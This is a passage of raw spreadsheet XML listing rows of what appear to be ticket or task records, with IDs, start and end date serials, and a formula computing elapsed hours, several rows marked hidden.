      </c>
      <c r="G1512" t="s">
        <v>43</v>
      </c>
      <c r="H1512" t="str">
        <f>TEXT(F1512-E1512,"[h]")</f>
        <v>113</v>
      </c>
    </row>
    <row r="1513" spans="1:8">
      <c r="A1513" t="s">
        <v>4043</v>
      </c>
      <c r="B1513">
        <v>11669</v>
      </c>
      <c r="C1513" t="s">
        <v>4044</v>
      </c>
      <c r="D1513" t="s">
        <v>7</v>
      </c>
      <c r="E1513" s="1">
        <v>43315.819930555554</v>
      </c>
      <c r="F1513" s="1">
        <v>43319.19635416667</v>
      </c>
      <c r="G1513" t="s">
        <v>19</v>
      </c>
      <c r="H1513" t="str">
        <f>TEXT(F1513-E1513,"[h]")</f>
        <v>81</v>
      </c>
    </row>
    <row r="1514" spans="1:8" hidden="1">
      <c r="A1514" t="s">
        <v>4045</v>
      </c>
      <c r="B1514">
        <v>11668</v>
      </c>
      <c r="C1514" t="s">
        <v>4046</v>
      </c>
      <c r="D1514" t="s">
        <v>7</v>
      </c>
      <c r="E1514" s="1">
        <v>43315.112349537034</v>
      </c>
      <c r="F1514" s="1">
        <v>43319.19635416667</v>
      </c>
      <c r="G1514" t="s">
        <v>109</v>
      </c>
      <c r="H1514" t="str">
        <f>TEXT(F1514-E1514,"[h]")</f>
        <v>98</v>
      </c>
    </row>
    <row r="1515" spans="1:8">
      <c r="A1515" t="s">
        <v>4047</v>
      </c>
      <c r="B1515">
        <v>11667</v>
      </c>
      <c r="C1515" t="s">
        <v>4048</v>
      </c>
      <c r="D1515" t="s">
        <v>7</v>
      </c>
      <c r="E1515" s="1">
        <v>43315.025856481479</v>
      </c>
      <c r="F1515" s="1">
        <v>43459.762384259258</v>
      </c>
      <c r="G1515" t="s">
        <v>1669</v>
      </c>
      <c r="H1515" t="str">
        <f>TEXT(F1515-E1515,"[h]")</f>
        <v>3473</v>
      </c>
    </row>
    <row r="1516" spans="1:8" hidden="1">
      <c r="A1516" t="s">
        <v>4049</v>
      </c>
      <c r="B1516">
        <v>11666</v>
      </c>
      <c r="C1516" t="s">
        <v>4050</v>
      </c>
      <c r="D1516" t="s">
        <v>7</v>
      </c>
      <c r="E1516" s="1">
        <v>43315.022465277776</v>
      </c>
      <c r="F1516" s="1">
        <v>43322.903703703705</v>
      </c>
      <c r="G1516" t="s">
        <v>118</v>
      </c>
      <c r="H1516" t="str">
        <f>TEXT(F1516-E1516,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="1517" spans="1:8">
      <c r="A1517" t="s">
        <v>4051</v>
      </c>
      <c r="B1517">
        <v>11665</v>
      </c>
      <c r="C1517" t="s">
        <v>4052</v>
      </c>
      <c r="D1517" t="s">
        <v>7</v>
      </c>
      <c r="E1517" s="1">
        <v>43314.828240740739</v>
      </c>
      <c r="F1517" s="1">
        <v>43314.96675925926</v>
      </c>
      <c r="G1517" t="s">
        <v>160</v>
      </c>
      <c r="H1517" t="str">
        <f>TEXT(F1517-E1517,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1518" spans="1:8" hidden="1">
      <c r="A1518" t="s">
        <v>4053</v>
      </c>
      <c r="B1518">
        <v>11664</v>
      </c>
      <c r="C1518" t="s">
        <v>4054</v>
      </c>
      <c r="D1518" t="s">
        <v>7</v>
      </c>
      <c r="E1518" s="1">
        <v>43314.578842592593</v>
      </c>
      <c r="F1518" s="1">
        <v>43408.792337962965</v>
      </c>
      <c r="G1518" t="s">
        <v>3114</v>
      </c>
      <c r="H1518" t="str">
        <f>TEXT(F1518-E1518,"[h]")</f>
        <v>2261</v>
      </c>
    </row>
    <row r="1519" spans="1:8" hidden="1">
      <c r="A1519" t="s">
        <v>4055</v>
      </c>
      <c r="B1519">
        <v>11662</v>
      </c>
      <c r="C1519" t="s">
        <v>4056</v>
      </c>
      <c r="D1519" t="s">
        <v>7</v>
      </c>
      <c r="E1519" s="1">
        <v>43313.841736111113</v>
      </c>
      <c r="F1519" s="1">
        <v>43319.687523148146</v>
      </c>
      <c r="G1519" t="s">
        <v>55</v>
      </c>
      <c r="H1519" t="str">
        <f>TEXT(F1519-E1519,"[h]")</f>
        <v>140</v>
      </c>
    </row>
    <row r="1520" spans="1:8">
      <c r="A1520" t="s">
        <v>4057</v>
      </c>
      <c r="B1520">
        <v>11661</v>
      </c>
      <c r="C1520" t="s">
        <v>4058</v>
      </c>
      <c r="D1520" t="s">
        <v>7</v>
      </c>
      <c r="E1520" s="1">
        <v>43313.770891203705</v>
      </c>
      <c r="F1520" s="1">
        <v>43313.926504629628</v>
      </c>
      <c r="G1520" t="s">
        <v>4059</v>
      </c>
      <c r="H1520" t="str">
        <f>TEXT(F1520-E1520,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1521" spans="1:8" hidden="1">
      <c r="A1521" t="s">
        <v>4060</v>
      </c>
      <c r="B1521">
        <v>11660</v>
      </c>
      <c r="C1521" t="s">
        <v>4061</v>
      </c>
      <c r="D1521" t="s">
        <v>7</v>
      </c>
      <c r="E1521" s="1">
        <v>43313.748379629629</v>
      </c>
      <c r="F1521" s="1">
        <v>43343.813275462962</v>
      </c>
      <c r="G1521" t="s">
        <v>4062</v>
      </c>
      <c r="H1521" t="str">
        <f>TEXT(F1521-E1521,"[h]")</f>
        <v>721</v>
      </c>
    </row>
    <row r="1522" spans="1:8">
      <c r="A1522" t="s">
        <v>4065</v>
      </c>
      <c r="B1522">
        <v>11656</v>
      </c>
      <c r="C1522" t="s">
        <v>4066</v>
      </c>
      <c r="D1522" t="s">
        <v>7</v>
      </c>
      <c r="E1522" s="1">
        <v>43313.614837962959</v>
      </c>
      <c r="F1522" s="1">
        <v>43331.308541666665</v>
      </c>
      <c r="G1522" t="s">
        <v>19</v>
      </c>
      <c r="H1522" t="str">
        <f>TEXT(F1522-E1522,"[h]")</f>
        <v>424</v>
      </c>
    </row>
    <row r="1523" spans="1:8" hidden="1">
      <c r="A1523" t="s">
        <v>4067</v>
      </c>
      <c r="B1523">
        <v>11653</v>
      </c>
      <c r="C1523" t="s">
        <v>4068</v>
      </c>
      <c r="D1523" t="s">
        <v>7</v>
      </c>
      <c r="E1523" s="1">
        <v>43313.236168981479</v>
      </c>
      <c r="F1523" s="1">
        <v>43439.963854166665</v>
      </c>
      <c r="G1523" t="s">
        <v>4069</v>
      </c>
      <c r="H1523" t="str">
        <f>TEXT(F1523-E1523,"[h]")</f>
        <v>3041</v>
      </c>
    </row>
    <row r="1524" spans="1:8">
      <c r="A1524" t="s">
        <v>4063</v>
      </c>
      <c r="B1524">
        <v>11652</v>
      </c>
      <c r="C1524" t="s">
        <v>4064</v>
      </c>
      <c r="D1524" t="s">
        <v>7</v>
      </c>
      <c r="E1524" s="1">
        <v>43313.156238425923</v>
      </c>
      <c r="F1524" s="1">
        <v>43313.627013888887</v>
      </c>
      <c r="G1524" t="s">
        <v>19</v>
      </c>
      <c r="H1524" t="str">
        <f>TEXT(F1524-E1524,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1525" spans="1:8">
      <c r="A1525" t="s">
        <v>4070</v>
      </c>
      <c r="B1525">
        <v>11651</v>
      </c>
      <c r="C1525" t="s">
        <v>4071</v>
      </c>
      <c r="D1525" t="s">
        <v>7</v>
      </c>
      <c r="E1525" s="1">
        <v>43313.150509259256</v>
      </c>
      <c r="F1525" s="1">
        <v>43323.946435185186</v>
      </c>
      <c r="G1525" t="s">
        <v>25</v>
      </c>
      <c r="H1525" t="str">
        <f>TEXT(F1525-E1525,"[h]")</f>
        <v>259</v>
      </c>
    </row>
    <row r="1526" spans="1:8" hidden="1">
      <c r="A1526" t="s">
        <v>4072</v>
      </c>
      <c r="B1526">
        <v>11650</v>
      </c>
      <c r="C1526" t="s">
        <v>4073</v>
      </c>
      <c r="D1526" t="s">
        <v>7</v>
      </c>
      <c r="E1526" s="1">
        <v>43312.853136574071</v>
      </c>
      <c r="F1526" s="1">
        <v>43312.866863425923</v>
      </c>
      <c r="G1526" t="s">
        <v>251</v>
      </c>
      <c r="H1526" t="str">
        <f>TEXT(F1526-E1526,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1527" spans="1:8" hidden="1">
      <c r="A1527" t="s">
        <v>4074</v>
      </c>
      <c r="B1527">
        <v>11649</v>
      </c>
      <c r="C1527" t="s">
        <v>4075</v>
      </c>
      <c r="D1527" t="s">
        <v>7</v>
      </c>
      <c r="E1527" s="1">
        <v>43312.789270833331</v>
      </c>
      <c r="F1527" s="1">
        <v>43326.646018518521</v>
      </c>
      <c r="G1527" t="s">
        <v>4076</v>
      </c>
      <c r="H1527" t="str">
        <f>TEXT(F1527-E1527,"[h]")</f>
        <v>332</v>
      </c>
    </row>
    <row r="1528" spans="1:8" hidden="1">
      <c r="A1528" t="s">
        <v>4079</v>
      </c>
      <c r="B1528">
        <v>11647</v>
      </c>
      <c r="C1528" t="s">
        <v>4080</v>
      </c>
      <c r="D1528" t="s">
        <v>7</v>
      </c>
      <c r="E1528" s="1">
        <v>43312.719872685186</v>
      </c>
      <c r="F1528" s="1">
        <v>43312.759606481479</v>
      </c>
      <c r="G1528" t="s">
        <v>4081</v>
      </c>
      <c r="H1528" t="str">
        <f>TEXT(F1528-E1528,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1529" spans="1:8">
      <c r="A1529" t="s">
        <v>4077</v>
      </c>
      <c r="B1529">
        <v>11644</v>
      </c>
      <c r="C1529" t="s">
        <v>4078</v>
      </c>
      <c r="D1529" t="s">
        <v>7</v>
      </c>
      <c r="E1529" s="1">
        <v>43312.316388888888</v>
      </c>
      <c r="F1529" s="1">
        <v>43312.747349537036</v>
      </c>
      <c r="G1529" t="s">
        <v>3373</v>
      </c>
      <c r="H1529" t="str">
        <f>TEXT(F1529-E1529,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1530" spans="1:8" hidden="1">
      <c r="A1530" t="s">
        <v>4082</v>
      </c>
      <c r="B1530">
        <v>11643</v>
      </c>
      <c r="C1530" t="s">
        <v>4083</v>
      </c>
      <c r="D1530" t="s">
        <v>7</v>
      </c>
      <c r="E1530" s="1">
        <v>43312.091331018521</v>
      </c>
      <c r="F1530" s="1">
        <v>43312.118634259263</v>
      </c>
      <c r="G1530" t="s">
        <v>90</v>
      </c>
      <c r="H1530" t="str">
        <f>TEXT(F1530-E1530,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1531" spans="1:8">
      <c r="A1531" t="s">
        <v>4084</v>
      </c>
      <c r="B1531">
        <v>11642</v>
      </c>
      <c r="C1531" t="s">
        <v>4085</v>
      </c>
      <c r="D1531" t="s">
        <v>7</v>
      </c>
      <c r="E1531" s="1">
        <v>43311.917037037034</v>
      </c>
      <c r="F1531" s="1">
        <v>43328.852418981478</v>
      </c>
      <c r="G1531" t="s">
        <v>16</v>
      </c>
      <c r="H1531" t="str">
        <f>TEXT(F1531-E1531,"[h]")</f>
        <v>406</v>
      </c>
    </row>
    <row r="1532" spans="1:8">
      <c r="A1532" t="s">
        <v>4086</v>
      </c>
      <c r="B1532">
        <v>11639</v>
      </c>
      <c r="C1532" t="s">
        <v>4087</v>
      </c>
      <c r="D1532" t="s">
        <v>7</v>
      </c>
      <c r="E1532" s="1">
        <v>43311.353750000002</v>
      </c>
      <c r="F1532" s="1">
        <v>43312.747349537036</v>
      </c>
      <c r="G1532" t="s">
        <v>3373</v>
      </c>
      <c r="H1532" t="str">
        <f>TEXT(F1532-E1532,"[h]")</f>
        <v>33</v>
      </c>
    </row>
    <row r="1533" spans="1:8" hidden="1">
      <c r="A1533" t="s">
        <v>4088</v>
      </c>
      <c r="B1533">
        <v>11638</v>
      </c>
      <c r="C1533" t="s">
        <v>4089</v>
      </c>
      <c r="D1533" t="s">
        <v>7</v>
      </c>
      <c r="E1533" s="1">
        <v>43311.265092592592</v>
      </c>
      <c r="F1533" s="1">
        <v>43312.760775462964</v>
      </c>
      <c r="G1533" t="s">
        <v>4090</v>
      </c>
      <c r="H1533" t="str">
        <f>TEXT(F1533-E1533,"[h]")</f>
        <v>35</v>
      </c>
    </row>
    <row r="1534" spans="1:8" hidden="1">
      <c r="A1534" t="s">
        <v>4091</v>
      </c>
      <c r="B1534">
        <v>11637</v>
      </c>
      <c r="C1534" t="s">
        <v>4092</v>
      </c>
      <c r="D1534" t="s">
        <v>7</v>
      </c>
      <c r="E1534" s="1">
        <v>43311.256423611114</v>
      </c>
      <c r="F1534" s="1">
        <v>43312.746793981481</v>
      </c>
      <c r="G1534" t="s">
        <v>258</v>
      </c>
      <c r="H1534" t="str">
        <f>TEXT(F1534-E1534,"[h]")</f>
        <v>35</v>
      </c>
    </row>
    <row r="1535" spans="1:8" hidden="1">
      <c r="A1535" t="s">
        <v>4093</v>
      </c>
      <c r="B1535">
        <v>11636</v>
      </c>
      <c r="C1535" t="s">
        <v>4094</v>
      </c>
      <c r="D1535" t="s">
        <v>7</v>
      </c>
      <c r="E1535" s="1">
        <v>43311.214965277781</v>
      </c>
      <c r="F1535" s="1">
        <v>43313.627013888887</v>
      </c>
      <c r="G1535" t="s">
        <v>109</v>
      </c>
      <c r="H1535" t="str">
        <f>TEXT(F1535-E1535,"[h]")</f>
        <v>57</v>
      </c>
    </row>
    <row r="1536" spans="1:8">
      <c r="A1536" t="s">
        <v>4095</v>
      </c>
      <c r="B1536">
        <v>11635</v>
      </c>
      <c r="C1536" t="s">
        <v>4096</v>
      </c>
      <c r="D1536" t="s">
        <v>7</v>
      </c>
      <c r="E1536" s="1">
        <v>43310.891180555554</v>
      </c>
      <c r="F1536" s="1">
        <v>43321.287523148145</v>
      </c>
      <c r="G1536" t="s">
        <v>4013</v>
      </c>
      <c r="H1536" t="str">
        <f>TEXT(F1536-E1536,"[h]")</f>
        <v>249</v>
      </c>
    </row>
    <row r="1537" spans="1:8" hidden="1">
      <c r="A1537" t="s">
        <v>4097</v>
      </c>
      <c r="B1537">
        <v>11634</v>
      </c>
      <c r="C1537" t="s">
        <v>4098</v>
      </c>
      <c r="D1537" t="s">
        <v>7</v>
      </c>
      <c r="E1537" s="1">
        <v>43310.526620370372</v>
      </c>
      <c r="F1537" s="1">
        <v>43312.712812500002</v>
      </c>
      <c r="G1537" t="s">
        <v>4099</v>
      </c>
      <c r="H1537" t="str">
        <f>TEXT(F1537-E1537,"[h]")</f>
        <v>52</v>
      </c>
    </row>
    <row r="1538" spans="1:8" hidden="1">
      <c r="A1538" t="s">
        <v>4100</v>
      </c>
      <c r="B1538">
        <v>11633</v>
      </c>
      <c r="C1538" t="s">
        <v>4101</v>
      </c>
      <c r="D1538" t="s">
        <v>7</v>
      </c>
      <c r="E1538" s="1">
        <v>43310.028819444444</v>
      </c>
      <c r="F1538" s="1">
        <v>43327.681666666664</v>
      </c>
      <c r="G1538" t="s">
        <v>4102</v>
      </c>
      <c r="H1538" t="str">
        <f>TEXT(F1538-E1538,"[h]")</f>
        <v>423</v>
      </c>
    </row>
    <row r="1539" spans="1:8" hidden="1">
      <c r="A1539" t="s">
        <v>4103</v>
      </c>
      <c r="B1539">
        <v>11632</v>
      </c>
      <c r="C1539" t="s">
        <v>4104</v>
      </c>
      <c r="D1539" t="s">
        <v>7</v>
      </c>
      <c r="E1539" s="1">
        <v>43309.577638888892</v>
      </c>
      <c r="F1539" s="1">
        <v>43602.083993055552</v>
      </c>
      <c r="G1539" t="s">
        <v>157</v>
      </c>
      <c r="H1539" t="str">
        <f>TEXT(F1539-E1539,"[h]")</f>
        <v>7020</v>
      </c>
    </row>
    <row r="1540" spans="1:8" hidden="1">
      <c r="A1540" t="s">
        <v>4105</v>
      </c>
      <c r="B1540">
        <v>11631</v>
      </c>
      <c r="C1540" t="s">
        <v>4106</v>
      </c>
      <c r="D1540" t="s">
        <v>7</v>
      </c>
      <c r="E1540" s="1">
        <v>43309.254780092589</v>
      </c>
      <c r="F1540" s="1">
        <v>43335.038680555554</v>
      </c>
      <c r="G1540" t="s">
        <v>2051</v>
      </c>
      <c r="H1540" t="str">
        <f>TEXT(F1540-E1540,"[h]")</f>
        <v>618</v>
      </c>
    </row>
    <row r="1541" spans="1:8" hidden="1">
      <c r="A1541" t="s">
        <v>4107</v>
      </c>
      <c r="B1541">
        <v>11630</v>
      </c>
      <c r="C1541" t="s">
        <v>4108</v>
      </c>
      <c r="D1541" t="s">
        <v>7</v>
      </c>
      <c r="E1541" s="1">
        <v>43308.762152777781</v>
      </c>
      <c r="F1541" s="1">
        <v>43310.729317129626</v>
      </c>
      <c r="G1541" t="s">
        <v>66</v>
      </c>
      <c r="H1541" t="str">
        <f>TEXT(F1541-E1541,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="1542" spans="1:8" hidden="1">
      <c r="A1542" t="s">
        <v>4109</v>
      </c>
      <c r="B1542">
        <v>11628</v>
      </c>
      <c r="C1542" t="s">
        <v>4110</v>
      </c>
      <c r="D1542" t="s">
        <v>7</v>
      </c>
      <c r="E1542" s="1">
        <v>43308.413310185184</v>
      </c>
      <c r="F1542" s="1">
        <v>43312.714259259257</v>
      </c>
      <c r="G1542" t="s">
        <v>109</v>
      </c>
      <c r="H1542" t="str">
        <f>TEXT(F1542-E1542,"[h]")</f>
        <v>103</v>
      </c>
    </row>
    <row r="1543" spans="1:8" hidden="1">
      <c r="A1543" t="s">
        <v>4111</v>
      </c>
      <c r="B1543">
        <v>11626</v>
      </c>
      <c r="C1543" t="s">
        <v>4112</v>
      </c>
      <c r="D1543" t="s">
        <v>7</v>
      </c>
      <c r="E1543" s="1">
        <v>43308.206574074073</v>
      </c>
      <c r="F1543" s="1">
        <v>43308.819050925929</v>
      </c>
      <c r="G1543" t="s">
        <v>75</v>
      </c>
      <c r="H1543" t="str">
        <f>TEXT(F1543-E1543,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1544" spans="1:8">
      <c r="A1544" t="s">
        <v>4113</v>
      </c>
      <c r="B1544">
        <v>11625</v>
      </c>
      <c r="C1544" t="s">
        <v>4114</v>
      </c>
      <c r="D1544" t="s">
        <v>7</v>
      </c>
      <c r="E1544" s="1">
        <v>43307.967326388891</v>
      </c>
      <c r="F1544" s="1">
        <v>43330.632951388892</v>
      </c>
      <c r="G1544" t="s">
        <v>160</v>
      </c>
      <c r="H1544" t="str">
        <f>TEXT(F1544-E1544,"[h]")</f>
        <v>543</v>
      </c>
    </row>
    <row r="1545" spans="1:8" hidden="1">
      <c r="A1545" t="s">
        <v>4115</v>
      </c>
      <c r="B1545">
        <v>11621</v>
      </c>
      <c r="C1545" t="s">
        <v>4116</v>
      </c>
      <c r="D1545" t="s">
        <v>7</v>
      </c>
      <c r="E1545" s="1">
        <v>43307.611203703702</v>
      </c>
      <c r="F1545" s="1">
        <v>43307.69394675926</v>
      </c>
      <c r="G1545" t="s">
        <v>1762</v>
      </c>
      <c r="H1545" t="str">
        <f>TEXT(F1545-E1545,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1546" spans="1:8" hidden="1">
      <c r="A1546" t="s">
        <v>4117</v>
      </c>
      <c r="B1546">
        <v>11618</v>
      </c>
      <c r="C1546" t="s">
        <v>4118</v>
      </c>
      <c r="D1546" t="s">
        <v>7</v>
      </c>
      <c r="E1546" s="1">
        <v>43307.354826388888</v>
      </c>
      <c r="F1546" s="1">
        <v>43307.656631944446</v>
      </c>
      <c r="G1546" t="s">
        <v>304</v>
      </c>
      <c r="H1546" t="str">
        <f>TEXT(F1546-E1546,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1547" spans="1:8">
      <c r="A1547" t="s">
        <v>4119</v>
      </c>
      <c r="B1547">
        <v>11617</v>
      </c>
      <c r="C1547" t="s">
        <v>4120</v>
      </c>
      <c r="D1547" t="s">
        <v>7</v>
      </c>
      <c r="E1547" s="1">
        <v>43307.158750000002</v>
      </c>
      <c r="F1547" s="1">
        <v>43365.651145833333</v>
      </c>
      <c r="G1547" t="s">
        <v>958</v>
      </c>
      <c r="H1547" t="str">
        <f>TEXT(F1547-E1547,"[h]")</f>
        <v>1403</v>
      </c>
    </row>
    <row r="1548" spans="1:8" hidden="1">
      <c r="A1548" t="s">
        <v>4121</v>
      </c>
      <c r="B1548">
        <v>11616</v>
      </c>
      <c r="C1548" t="s">
        <v>4122</v>
      </c>
      <c r="D1548" t="s">
        <v>7</v>
      </c>
      <c r="E1548" s="1">
        <v>43307.018958333334</v>
      </c>
      <c r="F1548" s="1">
        <v>43313.20753472222</v>
      </c>
      <c r="G1548" t="s">
        <v>1305</v>
      </c>
      <c r="H1548" t="str">
        <f>TEXT(F1548-E1548,"[h]")</f>
        <v>148</v>
      </c>
    </row>
    <row r="1549" spans="1:8">
      <c r="A1549" t="s">
        <v>4123</v>
      </c>
      <c r="B1549">
        <v>11615</v>
      </c>
      <c r="C1549" t="s">
        <v>4124</v>
      </c>
      <c r="D1549" t="s">
        <v>7</v>
      </c>
      <c r="E1549" s="1">
        <v>43306.853437500002</v>
      </c>
      <c r="F1549" s="1">
        <v>43316.552581018521</v>
      </c>
      <c r="G1549" t="s">
        <v>16</v>
      </c>
      <c r="H1549" t="str">
        <f>TEXT(F1549-E1549,"[h]")</f>
        <v>232</v>
      </c>
    </row>
    <row r="1550" spans="1:8" hidden="1">
      <c r="A1550" t="s">
        <v>4125</v>
      </c>
      <c r="B1550">
        <v>11613</v>
      </c>
      <c r="C1550" t="s">
        <v>4126</v>
      </c>
      <c r="D1550" t="s">
        <v>7</v>
      </c>
      <c r="E1550" s="1">
        <v>43305.783194444448</v>
      </c>
      <c r="F1550" s="1">
        <v>43385.356076388889</v>
      </c>
      <c r="G1550" t="s">
        <v>301</v>
      </c>
      <c r="H1550" t="str">
        <f>TEXT(F1550-E1550,"[h]")</f>
        <v>1909</v>
      </c>
    </row>
    <row r="1551" spans="1:8" hidden="1">
      <c r="A1551" t="s">
        <v>4127</v>
      </c>
      <c r="B1551">
        <v>11611</v>
      </c>
      <c r="C1551" t="s">
        <v>4128</v>
      </c>
      <c r="D1551" t="s">
        <v>7</v>
      </c>
      <c r="E1551" s="1">
        <v>43304.963402777779</v>
      </c>
      <c r="F1551" s="1">
        <v>43313.825543981482</v>
      </c>
      <c r="G1551" t="s">
        <v>1584</v>
      </c>
      <c r="H1551" t="str">
        <f>TEXT(F1551-E1551,"[h]")</f>
        <v>212</v>
      </c>
    </row>
    <row r="1552" spans="1:8" hidden="1">
      <c r="A1552" t="s">
        <v>4129</v>
      </c>
      <c r="B1552">
        <v>11610</v>
      </c>
      <c r="C1552" t="s">
        <v>4130</v>
      </c>
      <c r="D1552" t="s">
        <v>7</v>
      </c>
      <c r="E1552" s="1">
        <v>43304.949212962965</v>
      </c>
      <c r="F1552" s="1">
        <v>43327.675833333335</v>
      </c>
      <c r="G1552" t="s">
        <v>55</v>
      </c>
      <c r="H1552" t="str">
        <f>TEXT(F1552-E1552,"[h]")</f>
        <v>545</v>
      </c>
    </row>
    <row r="1553" spans="1:8" hidden="1">
      <c r="A1553" t="s">
        <v>4131</v>
      </c>
      <c r="B1553">
        <v>11609</v>
      </c>
      <c r="C1553" t="s">
        <v>4132</v>
      </c>
      <c r="D1553" t="s">
        <v>7</v>
      </c>
      <c r="E1553" s="1">
        <v>43304.933344907404</v>
      </c>
      <c r="F1553" s="1">
        <v>43323.152118055557</v>
      </c>
      <c r="G1553" t="s">
        <v>51</v>
      </c>
      <c r="H1553" t="str">
        <f>TEXT(F1553-E1553,"[h]")</f>
        <v>437</v>
      </c>
    </row>
    <row r="1554" spans="1:8" hidden="1">
      <c r="A1554" t="s">
        <v>446</v>
      </c>
      <c r="B1554">
        <v>11606</v>
      </c>
      <c r="C1554" t="s">
        <v>4133</v>
      </c>
      <c r="D1554" t="s">
        <v>7</v>
      </c>
      <c r="E1554" s="1">
        <v>43304.733958333331</v>
      </c>
      <c r="F1554" s="1">
        <v>43305.648796296293</v>
      </c>
      <c r="G1554" t="s">
        <v>51</v>
      </c>
      <c r="H1554" t="str">
        <f>TEXT(F1554-E1554,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="1555" spans="1:8">
      <c r="A1555" t="s">
        <v>4134</v>
      </c>
      <c r="B1555">
        <v>11605</v>
      </c>
      <c r="C1555" t="s">
        <v>4135</v>
      </c>
      <c r="D1555" t="s">
        <v>7</v>
      </c>
      <c r="E1555" s="1">
        <v>43304.663877314815</v>
      </c>
      <c r="F1555" s="1">
        <v>43316.553067129629</v>
      </c>
      <c r="G1555" t="s">
        <v>25</v>
      </c>
      <c r="H1555" t="str">
        <f>TEXT(F1555-E1555,"[h]")</f>
        <v>285</v>
      </c>
    </row>
    <row r="1556" spans="1:8" hidden="1">
      <c r="A1556" t="s">
        <v>4136</v>
      </c>
      <c r="B1556">
        <v>11604</v>
      </c>
      <c r="C1556" t="s">
        <v>4137</v>
      </c>
      <c r="D1556" t="s">
        <v>7</v>
      </c>
      <c r="E1556" s="1">
        <v>43304.622141203705</v>
      </c>
      <c r="F1556" s="1">
        <v>43320.004930555559</v>
      </c>
      <c r="G1556" t="s">
        <v>3852</v>
      </c>
      <c r="H1556" t="str">
        <f>TEXT(F1556-E1556,"[h]")</f>
        <v>369</v>
      </c>
    </row>
    <row r="1557" spans="1:8" hidden="1">
      <c r="A1557" t="s">
        <v>4138</v>
      </c>
      <c r="B1557">
        <v>11602</v>
      </c>
      <c r="C1557" t="s">
        <v>4139</v>
      </c>
      <c r="D1557" t="s">
        <v>7</v>
      </c>
      <c r="E1557" s="1">
        <v>43303.98510416667</v>
      </c>
      <c r="F1557" s="1">
        <v>43304.03528935185</v>
      </c>
      <c r="G1557" t="s">
        <v>716</v>
      </c>
      <c r="H1557" t="str">
        <f>TEXT(F1557-E1557,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1558" spans="1:8">
      <c r="A1558" t="s">
        <v>4140</v>
      </c>
      <c r="B1558">
        <v>11601</v>
      </c>
      <c r="C1558" t="s">
        <v>4141</v>
      </c>
      <c r="D1558" t="s">
        <v>7</v>
      </c>
      <c r="E1558" s="1">
        <v>43303.874108796299</v>
      </c>
      <c r="F1558" s="1">
        <v>43304.03497685185</v>
      </c>
      <c r="G1558" t="s">
        <v>106</v>
      </c>
      <c r="H1558" t="str">
        <f>TEXT(F1558-E1558,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1559" spans="1:8" hidden="1">
      <c r="B1559">
        <v>11600</v>
      </c>
      <c r="C1559" t="s">
        <v>4142</v>
      </c>
      <c r="D1559" t="s">
        <v>7</v>
      </c>
      <c r="E1559" s="1">
        <v>43303.598287037035</v>
      </c>
      <c r="F1559" s="1">
        <v>43303.952106481483</v>
      </c>
      <c r="G1559" t="s">
        <v>55</v>
      </c>
      <c r="H1559" t="str">
        <f>TEXT(F1559-E1559,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1560" spans="1:8" hidden="1">
      <c r="A1560" t="s">
        <v>4143</v>
      </c>
      <c r="B1560">
        <v>11598</v>
      </c>
      <c r="C1560" t="s">
        <v>4144</v>
      </c>
      <c r="D1560" t="s">
        <v>7</v>
      </c>
      <c r="E1560" s="1">
        <v>43303.358020833337</v>
      </c>
      <c r="F1560" s="1">
        <v>43303.980682870373</v>
      </c>
      <c r="G1560" t="s">
        <v>55</v>
      </c>
      <c r="H1560" t="str">
        <f>TEXT(F1560-E1560,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1561" spans="1:8" hidden="1">
      <c r="B1561">
        <v>11596</v>
      </c>
      <c r="C1561" t="s">
        <v>4145</v>
      </c>
      <c r="D1561" t="s">
        <v>7</v>
      </c>
      <c r="E1561" s="1">
        <v>43302.988437499997</v>
      </c>
      <c r="F1561" s="1">
        <v>43368.678912037038</v>
      </c>
      <c r="G1561" t="s">
        <v>4146</v>
      </c>
      <c r="H1561" t="str">
        <f>TEXT(F1561-E1561,"[h]")</f>
        <v>1576</v>
      </c>
    </row>
    <row r="1562" spans="1:8">
      <c r="A1562" t="s">
        <v>4147</v>
      </c>
      <c r="B1562">
        <v>11595</v>
      </c>
      <c r="C1562" t="s">
        <v>4148</v>
      </c>
      <c r="D1562" t="s">
        <v>7</v>
      </c>
      <c r="E1562" s="1">
        <v>43301.66946759259</v>
      </c>
      <c r="F1562" s="1">
        <v>43313.765682870369</v>
      </c>
      <c r="G1562" t="s">
        <v>1669</v>
      </c>
      <c r="H1562" t="str">
        <f>TEXT(F1562-E1562,"[h]")</f>
        <v>290</v>
      </c>
    </row>
    <row r="1563" spans="1:8" hidden="1">
      <c r="A1563" t="s">
        <v>4149</v>
      </c>
      <c r="B1563">
        <v>11594</v>
      </c>
      <c r="C1563" t="s">
        <v>4150</v>
      </c>
      <c r="D1563" t="s">
        <v>7</v>
      </c>
      <c r="E1563" s="1">
        <v>43301.489340277774</v>
      </c>
      <c r="F1563" s="1">
        <v>43319.991226851853</v>
      </c>
      <c r="G1563" t="s">
        <v>2200</v>
      </c>
      <c r="H1563" t="str">
        <f>TEXT(F1563-E1563,"[h]")</f>
        <v>444</v>
      </c>
    </row>
    <row r="1564" spans="1:8" hidden="1">
      <c r="A1564" t="s">
        <v>4151</v>
      </c>
      <c r="B1564">
        <v>11593</v>
      </c>
      <c r="C1564" t="s">
        <v>4152</v>
      </c>
      <c r="D1564" t="s">
        <v>7</v>
      </c>
      <c r="E1564" s="1">
        <v>43301.407592592594</v>
      </c>
      <c r="F1564" s="1">
        <v>43312.708414351851</v>
      </c>
      <c r="G1564" t="s">
        <v>2200</v>
      </c>
      <c r="H1564" t="str">
        <f>TEXT(F1564-E1564,"[h]")</f>
        <v>271</v>
      </c>
    </row>
    <row r="1565" spans="1:8" hidden="1">
      <c r="A1565" t="s">
        <v>446</v>
      </c>
      <c r="B1565">
